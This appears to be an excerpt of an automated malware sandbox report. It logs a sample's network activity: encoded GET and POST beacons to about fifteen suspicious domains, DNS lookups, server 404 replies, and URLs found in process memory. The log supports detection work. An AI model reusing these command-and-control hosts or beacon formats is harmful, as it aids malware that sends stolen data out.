    Source: global trafficHTTP traffic detected: GET /uaef/?2J=znvVMZI6wclGwSNQgZtr5fBMguex2NmDUWcQCD5rzoJFeirSAcNEfn/4jSETcpej++6Zf7EsBdpUeNRucPEp0Vp7Iz2INonuboPmggNf5Eh/heiOubkxKPwt67wGlkSjkQ==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.ecojomos.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /k81y/?2J=ijzO5vt4Wia988ezl94/5B5fhr01XtFEJs702F2lFCeAUQR2wSJY5h+0sGUliGD5vvb7tm1pzcvQX+qpOWiQ3K4hemU8wbaBHwJuA5BCX/yteUBDcWPxvtRpccaohSYfjw==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.717hy.netConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /i6b4/?2J=rbSOGHQf+oAIPcBZM/BWO4v0sc0ZI7pa6YU0oIiGfR+Ewkw1zlM3KmPagJJbTGfXhG2rczLZFwuqulMMl1sHkUxyatg9ogB88gOJZKl7SEK9bLYaCAnWqdxVYxi0oqyA/g==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.mrpokrovskii.proConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /ocnr/?2J=6FyD7uZOrviJgscx3zDo9l3wDpxd2lbJ6NQik1x0LfmClWpek8Fmgw2VUsZOzaCZ8a9BTDMjp2431cAe4Zlp/DG/ZAZ2b2TXHQALvARevfDq7KvJw4eUAghtZHK7htMeug==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.7vh2wy.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /b9df/?2J=dUH3FVfSLAHIHBRMvvPQgLWf0KXIT0dr2Awu2k06qg9LbooImE5C092/euUAt8NBFlVUBHDmvHBa3+G+T/z9BT74tEsDe+Pl6mU5GIhBpG7WZgGiesGf3hUVa6du6lWzSg==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.lsfanarolt.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /jj95/?2J=Pexrq8dBT+pohtdREgLaj2qM8aDHNwg4eoWqtxa3tUqS44OvUmk7LsvxHK5YH7fdz4458FvKpzVKrVQ2/F68/gTe2ya6Lr7IE54iaP1hci4bc8/+8Y3du4MuylwBJQVzoQ==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.129glenforest.comConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.madhf.techConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbhDcZOCNwErTQXryorxHC4PkDe5WJpFvO4SjuRTQ+4P0+jcQZ5F9wjze3RXp2BxR3tkOJaw==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.grandesofertas.funConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /p9qy/?2J=szOnwbI0B7M9cMMwX4bDwuNgoUWUV7slIpLLNm8Tfpa5tKMeNeGfvlEASyf1bFN7LlEkU7ntq56NwT9FzvKbuwV8GB1U7lwGbSSnMTrnLCsmtu5+GLJZif51cB3zkwMvhA==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.sankan-fukushi.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficHTTP traffic detected: GET /7arg/?2J=yBRFulyn6SusKZ+jwFF1qQiDnRV1yVxCYcOxd6ADnBv0QCWFr3q/C42N2s59F8UA9Wb/HU1T/Yso8my7bN9/45XMMrsG9LzPDXPeB6BMAupShH8CXHTl1JaA/+QsUvuMTg==&tXul=U2UloNhP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.rtpwslot888gol.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Source: global trafficDNS traffic detected: DNS query: www.bahaeng.com
    Source: global trafficDNS traffic detected: DNS query: www.atendefacil.info
    Source: global trafficDNS traffic detected: DNS query: www.sklad-iq.online
    Source: global trafficDNS traffic detected: DNS query: www.mdpc7.top
    Source: global trafficDNS traffic detected: DNS query: www.ecojomos.xyz
    Source: global trafficDNS traffic detected: DNS query: www.717hy.net
    Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
    Source: global trafficDNS traffic detected: DNS query: www.7vh2wy.top
    Source: global trafficDNS traffic detected: DNS query: www.lsfanarolt.shop
    Source: global trafficDNS traffic detected: DNS query: www.129glenforest.com
    Source: global trafficDNS traffic detected: DNS query: www.joube.shop
    Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
    Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
    Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
    Source: global trafficDNS traffic detected: DNS query: www.rtpwslot888gol.sbs
    Source: unknownHTTP traffic detected: POST /ovl0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.atendefacil.infoOrigin: http://www.atendefacil.infoReferer: http://www.atendefacil.info/ovl0/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6Data Ascii: 2J=hwzrur+12bJrC8f27KHLvyCdwI/5mR/bkbXgstYrX0q9wY0LJFZilPlK3lCCeKkCER8w3kM5L3YOCQWO5EZBWb/mhuPTqAuCP1iKBIl0Gukzh78DlZDhAm2A88L1vTMytt8AxdbP5qQOulAxS+OEyrM+OBmvYcUpKLzHMZHwnxjYzZJDSFJEfmiixfln9hY/FqzAhXM=
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:23 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:25 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:28 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:34:30 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:34:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:34:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:34:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:34:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Wed, 13 Nov 2024 14:34:52 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Wed, 13 Nov 2024 14:34:54 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Wed, 13 Nov 2024 14:34:57 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Wed, 13 Nov 2024 14:34:59 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Nov 2024 14:35:05 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Nov 2024 14:35:08 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Nov 2024 14:35:11 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Nov 2024 14:35:14 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 13 Nov 2024 14:35:20 GMT | server: LiteSpeed | strict-transport-security: max-age=63072000; includeSubDomains | x-frame-options: SAMEORIGIN | x-content-type-options: nosniff | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 13 Nov 2024 14:35:23 GMT | server: LiteSpeed | strict-transport-security: max-age=63072000; includeSubDomains | x-frame-options: SAMEORIGIN | x-content-type-options: nosniff | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 13 Nov 2024 14:35:25 GMT | server: LiteSpeed | strict-transport-security: max-age=63072000; includeSubDomains | x-frame-options: SAMEORIGIN | x-content-type-options: nosniff | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 13 Nov 2024 14:35:28 GMT | server: LiteSpeed | strict-transport-security: max-age=63072000; includeSubDomains | x-frame-options: SAMEORIGIN | x-content-type-options: nosniff | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:34 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:39 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:42 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:50 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:53 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:56 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:58 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:58 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 14:35:58 GMTContent-Type: text/htmlContent-Length: 146Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:36:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 17:48:32 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YQePIRYgS0X4yDeWfmMu7ZE0Hrd3IjYFPqzUFkACSCb2AqjyF236yOZwMUtN0Y97YcHzQRtj%2BnXuySmFfWcY13twaEVXUIBpb7hwfvpGZwlbgqqBOz8JzrGlrzuqniJKB4ni%2Bgm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7df18dec6b97-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:36:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 17:48:32 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h34ACzVB0bqwnNQpa%2FyDXh14QAQSBSfr43W4XnbD3VkbMW%2FTEB5TNiMHNS%2BaK5V8H4J%2BE150zUzbVh5VBKSPcXum6cFaiWqxOPA%2BpT%2BsUhf%2BE8BJSy9a0A8f8u7UoF8xpaXdjOHH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7e019eef2e57-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:36:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 17:48:32 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2euP4URg1J2vz3b62ZFwQbff6SE%2Fphv7Jp%2FgCbvP34epSrvesLZwSEUZRRe6zftrlmvTl9KRlbjAE%2Bpl3kGEVovEwyaYiyaDzq6R1ZymjdGO9L63NQa4A9rXRlhxMftVRkmxM7s"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7e1178150c03-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1822&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1746&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:36:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 17:48:32 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuB8W0H13iVlOUSTVbHzFlx9p9D2fhF8LS5wQeXcCZ3aToVDlE1qClAKh6JNKz2nmYc3CwzKbUe%2Fa5ZFGCpFDTKN02J%2FGo3xFve3ROVFU%2FfJQ6H58mv%2Bt8hcJYVflf75Ix9EIFIc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7e215f6c0bfb-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1387&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=444&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:09 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytes
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:12 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytes
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:14 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytes
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:17 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tA0dKiHcngbjM4J%2FoOvKisUDigbobik1ANvMdR6N%2F0%2BGUqbO%2FQIXDXTZTLf1QhZkrUO9i%2FCAYOZk1VMfIL%2F%2B0QbntCQ%2FAd%2FOh71geHsj8EV08i22Cawp5Kfwc7EXzNJU0dmq1Yo5%2FpM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7fe04ff02c9c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rzt9uIbXS8%2BDuPqqeNXcUmct2f8cxML6dLJ2WpGJsvzry0gP%2Fuik%2BLbalOn2TzzxGK36pKPGR02D%2Brx6RXKEs5AnxfIXfbrOqhnGG38KExtAYkgExT87svrLNeHyzeNagjtxU2fHQJCO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7fedacf73aaf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd2RvSQ%2FhDFu%2FxyV56mUce1wlGyxL1sc8xhrbRBLgYjS6RgigIGgfmd%2FV%2B2n8CHRVu9YAFir%2BAKaE5PxXhgFuiB%2BZ6%2FSwLrcmwhXm0xjj5Y2UDTxlvxUA%2Br2rJq6HWuQzjb0Bi82sjSR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f7ffdfa6f6b58-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1247&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1755&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:37:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRAqe8CMFAAfoRpV%2BtW7L08y28JxosKx912g6j7MoFd5RGvZjFn%2BWNnhsz8WuMj5cA2aHzxMnXuYW9ypP99eA9IffOskZC%2F%2BnWtucv5tsYXriXVs1P9gF0XexJVuH6wcWgKQhP5Wq3kN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1f800ea877eb12-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1234&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=447&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
    Source: Item-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003904000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://shkip2dom.com/
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003DBA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/p31e/?2J=L
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4743693637.0000000004D2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpwslot888gol.sbs
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4743693637.0000000004D2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpwslot888gol.sbs/7arg/
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005FFC000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000032BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
